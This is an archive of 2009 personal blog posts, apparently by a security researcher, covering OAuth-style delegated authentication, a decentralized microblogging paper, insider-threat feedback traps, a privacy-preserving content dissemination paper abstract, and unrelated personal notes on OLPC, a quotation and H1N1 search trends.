At least there are some positive signs, Twitter already has an OAuth API (They would also like to drop the basic authentication API that uses the above conversion pattern; I guess they continue to keep it due to migration/usability issues). I would feel little safer (but not completely) if the FB folks the following conversation using a delegated authentication mechanism.

Dude: hey FB, I want to access Tweets.
FB: No problem dude, I am sending you to Twitter (open ups a new browser window - domain twitter.com).
FB: hey Twitter, a dude wants to connect to Twitter.
Twitter: hey dude, FB (or any other third-party dude) wants to access your tweets; you cool with that?
Dude: yep, I am. (Dude type his/her username and password and give approval)
Twitter: hey FB, use this token to access Dude's tweets.
FB: dude, now you are all set.

Notice that the dude did not have to give private information such as twitter password to FB. In other words, the twitter password is still under the control of the dude. Nabeel's dilemma: should I wait till FB provides such an application or should I sacrifice my private information and go ahead with the current application?

It may appear I have derailed from the $subject of this blog post, but I was telling all this to motivate you about the need to have an open decentralized microblogging (aka the $subject). There has been some research work in this area. I found the following paper interesting in this regard.

Birds of a FETHR: Open, Decentralized Microblogging by researchers at the Rice university.
Abstract:
Microblogging, as exemplified by Twitter, is gaining popularity as a way to exchange short messages within social networks. However, the limitations of current microblog services—proprietary, centralized, and isolated—threaten the long-term viability of this new medium. In
this work we investigate the current state of microblogging and envision an open, distributed micropublishing service that addresses the weaknesses of today’s systems. We draw on traces taken from Twitter to characterize the microblogging workload. Our proposal, fethr, connects
micropublishers large and small in a single global network. New messages are gossiped among subscribers using a lightweight http-based protocol. Cryptographic measures protect authenticity and continuity of updates and prove message ordering even across providers.

Too much trust is not a good thing

2009-09-30T12:42:00.007-04:00

In any organization, you won't disagree that we need to have some level of trust in order to have a healthy working environment. Project managers trust developers to meet deliverables and develop according to the specification. System/network administrators are trusted not only to keep the infrastructure functional but also safe-guard from outsiders. Hospital employees are trusted not to misuse patient records. Bank employees are trusted not to misuse/illegally modify financial records. This very own trust could be a negative factor. I found this interesting report which explains three traps. The report is a result of a workshop of 25 research from various disciplines in 2004 to come up with a systems dynamic model in order to better understand insider threats/attacks.

The following diagram shows a simplified version of the full systems dynamic model. '+' indicates a proportional relationship and '-' indicates a inversely proportional relationship.

Detection trap:
Have you ever wondered, most of the time when an organization comes under an attack, they are usually under-invested on security control or they don't have any security controls at all? The detection extracted from the above diagram is a good explanation of this observation.

When the organization's perceived risk increases, the management is willing to invest on detection measurements (in the hope that the perceived risks will lower). With better detection mechanisms, it is likely to detect more insider attacks/attempts for such attacks. When the number of cases go up, it is natural to perceive that the organization is under higher risk. See, this loop feedbacks. At the same time the inverse is also true! At some point in time, the organization may perceive that the perceived level of risk is low (due to better education, better controls in place, better management, etc.). This motivates the management to invest less on detection capabilities. With a few measures to catch wrong doing, it is like that not many cases are caught. Now the organization may perceive even less risk as not many cases are detected. Notice the loop feedbacks in this case as well. Hence the detection trap.

Trust trap:
Sometimes, good intentional measurements from the management may themselves lead to attacks. The following digram shows how it unfolds with the level of trust the management has on its on employees.

When the management perceives a higher trust on the employees, they may decide that they don't need to have extensive security controls to monitor their employs in the belief that there will be hardly any employee who will turn an enemy of the company. With less detection capabilities, it is natural to see that there will only be a few detected attacks while many go unnoticed. With fewer reported attacks, the managerial trust goes even higher. This loop also feedbacks and hence creates the trust trap. Why does it happen like this? One possible reason, as the loop feedbacks, the perceived level of risk by the employees of getting caught falls down.

Unobserved emboldening:
While those two pitfalls continue to feedback, the following shows how the perception of risk by the employees/insiders change and then lead to full blown attacks.

When an insider attempts to do something wrong and it goes unnoticed, their perceived risk of doing that falls down. Hence, they they tend to do more probing. Notice that this loop also feedbacks, lower the perceived risk each iteration. (This scenario is true with other situations. When a person does something that is not acceptable by the society and it goes unnoticed, that person may tend to even bigger crimes. It does not always need to be a crime. The intention could innocuous. For example, a person may speed for fun. If that person is never copped, they may be tempted to go even faster.) When the perceived risk goes below a certain threshold, the insider may carry out the actual attack.

It should be noted that not all insiders act like this. In fact, this is only the minority. (Security controls are there to protect against a few bad people while making sure the good majority is not negatively affected by these measurements) This happens only when things go wrong, when things don't work out the way the employees want - for example - no recognition for work, no bonus/salary increase or less pay, possibility of being laid off, etc. In any case, in order to have a healthy and safe working environment, the management need to show a certain level of trust while keeping the perceived level of risk (as perceived by insiders) at an acceptable level (e.g. by training, by legally prosecuting wrong doers, security controls, etc.).

Ref: Preliminary System Dynamics Maps of the Insider Cyber-threat Problem, 2004.

Insider Threats: People-Process-Control

2009-09-30T10:20:00.003-04:00

I recently did a presentation on the $subject. You can access the slides from here. I used to think that if you have nearly perfect security control in place, you have a higher probability of surviving from malicious attacks. But the more I work in this area, the more I am convinced that technology plays only a partial role; People and Process play a bigger role. It is more evident if you look at insider attacks; these are carried out by people who have legitimate access to the systems/resources.

The power of wikipedia :)

2009-09-26T13:30:00.002-04:00

Softball rules.. (credit PhD comics)

Yesterday, we wanted to double-check the wallyball (not volleyball) rules.

Thought of the day

2009-09-26T11:42:00.004-04:00

We all have ability. The difference is how we use it.
~Stevie Wonder

This is very true. I always believe that each and everyone of us can do almost anything that others have done/have been doing and more! It is just that some people need some guidance/direction to figure out their abilities and put them into good use. For example, as a kid, I was terrible in math and didn't like it much at that time. (my early school records indicate this). However, with time (different people triggers at different times), good guidance (will never forget a few very special people) and self-motivation (encountered a few incidents which made me think hard), I turned math into one of my favorite subjects.

On a related note, I know some people who are really talented but are unfortunate in one way or the other (mainly due to factors out of their control - only the God knows why). They deserve our help who are blessed with many things in life. Making a difference is harder than earning money which comes and goes..

My personal information at your business is not safe!

2009-09-24T23:13:00.005-04:00

I was surprised to see the following results from a recent survey.

(Credit: Impreva)

This is a good example about the fact that many organizations do not view security as a top priority. The management is not willing to invest extra money to comply with security standards - especially true for small companies. They don't see the ROI (unless the security is breached). It is interesting to see more than half don't have faith in standards (PCI DSS); is it due to lack of knowledge about the standards or is it perceived to be more costly to have security measure in place compared recovering from a security breach? On second thought, I shouldn't be surprised about these results considering the large-scale breaches (1, 2, 3, 4, 5) we continue to see.

OLPC reaching SL students

2009-09-10T21:26:00.003-04:00

It is good to see OLPC reaching underprivileged schools in Sri Lanka. These XO laptops are equipped with local languages as well. I personally prefer if students are taught to use in English language; this will not only shink the gap of IT skills in urban (mainly in and around Colombo, and some other main cities) and rural areas, but also English language skills.

Our ICDE 2010 paper

2009-09-10T01:21:00.005-04:00

Our paper "A Privacy-Preserving Approach to Policy-Based Content Dissemination", Ning Shang, Mohamed Nabeel, Federica Paci, Elisa Bertino is to appear in the upcoming ICDE (International Conference in Data Engineering) 2010 conference. The acceptance rate for full papers is around 12.5%.

Abstract:
We propose a novel scheme for selective distribution of content, encoded as documents, that preserves the privacy of the users to whom the documents are delivered and is based on an efficient and novel group key management scheme. Our document broadcasting approach is based on access control policies specifying which users can access which documents, or subdocuments. Based on such policies, a broadcast document is segmented into multiple subdocuments, each encrypted with a different key. In line with modern attribute-based access control, policies are specified against identity attributes of users. However our broadcasting approach is privacy-preserving in that users are granted access to a specific document, or subdocument, according to the policies without the need of providing in clear information about their identity attributes to the document publisher. Under our approach, not only does the document publisher not learn the values of the identity attributes of users, but it also does not learn which policy conditions are verified by which users, thus inferences about the values of identity attributes are prevented. Moreover, our key management scheme on which the proposed broadcasting approach is based is efficient in that it does not require to send the decryption keys to the users along with the encrypted document. Users are able to reconstruct the keys to decrypt the authorized portions of a document based on subscription information they have received from the document publisher. The scheme also efficiently handles new subscription of users and revocation of subscriptions.

I am planning to make slides and other materials related to this work available to everyone soon.

Meditation..

2009-09-09T17:22:00.002-04:00

The geek way of meditation :)

(Source: The joy of tech)

Flu trend

2009-09-02T16:00:00.002-04:00

Now that Purdue has increased the awareness on H1N1 Influenza, I just wanted to see how it is being treated in rest of the world. I used Google Trends assuming the volume of search is roughly proportional to what I am after (there may be better tools for this?). Looks like Asians are more obsessed with H1N1 Influenza (aka swine flu). Also checked the trend in USA..people in USA have also started to search on H1N1 again from last month; there's a similar tend in Indiana state (looking at the cities it appears to be mainly by people in universities P, IU, IUPUI) .

H1N1 - All regions in 2009 for the term H1N1
Swine flu - All regions in 2009 for the term "swine flu"